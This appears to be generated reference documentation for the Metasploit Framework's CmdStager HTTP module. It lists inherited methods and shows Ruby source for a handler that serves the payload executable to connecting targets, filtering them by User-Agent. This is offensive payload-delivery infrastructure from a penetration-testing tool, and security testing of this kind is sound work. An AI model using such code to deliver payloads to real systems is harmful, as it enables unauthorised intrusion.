Module: Msf::Exploit::CmdStager::HTTP

Includes:
Remote::HttpServer
Included in:
Msf::Exploit::CmdStager
Defined in:
lib/msf/core/exploit/cmd_stager/http.rb

Instance Attribute Summary

Attributes included from Remote::SocketServer

#service

Instance Method Summary collapse

Methods included from Remote::HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from Remote::TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version

Methods included from Remote::SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #via_string

Instance Method Details

#initialize(info = {}) ⇒ Object



8
9
10
11
12
# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 8

def initialize(info = {})
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Aggressive
  ))
end

#on_request_uri(cli, request) ⇒ Object



27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 27

def on_request_uri(cli, request)
  client = cli.peerhost

  if (user_agent = request.headers['User-Agent'])
    client << " (#{user_agent})"
  end

  print_status("Client #{client} requested #{request.uri}")

  # NOTE: stager_instance is from Msf::Exploit::CmdStager
  if stager_instance.respond_to?(:user_agent)
    agent_regex = stager_instance.user_agent
  else
    agent_regex = /.*/
  end

  unless user_agent =~ agent_regex
    print_status("Sending 404 to #{client}")
    return send_not_found(cli)
  end

  print_status("Sending payload to #{client}")
  send_response(cli, exe) # NOTE: exe is from Msf::Exploit::CmdStager
end

#start_service(opts = {}) ⇒ Object



14
15
16
17
18
19
20
21
22
23
24
25
# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 14

def start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts
  datastore_ssl = datastore['SSL']
  datastore['SSL'] = !!opts[:ssl]

  super

  payload_uri = get_uri
  datastore['SSL'] = datastore_ssl

  payload_uri
end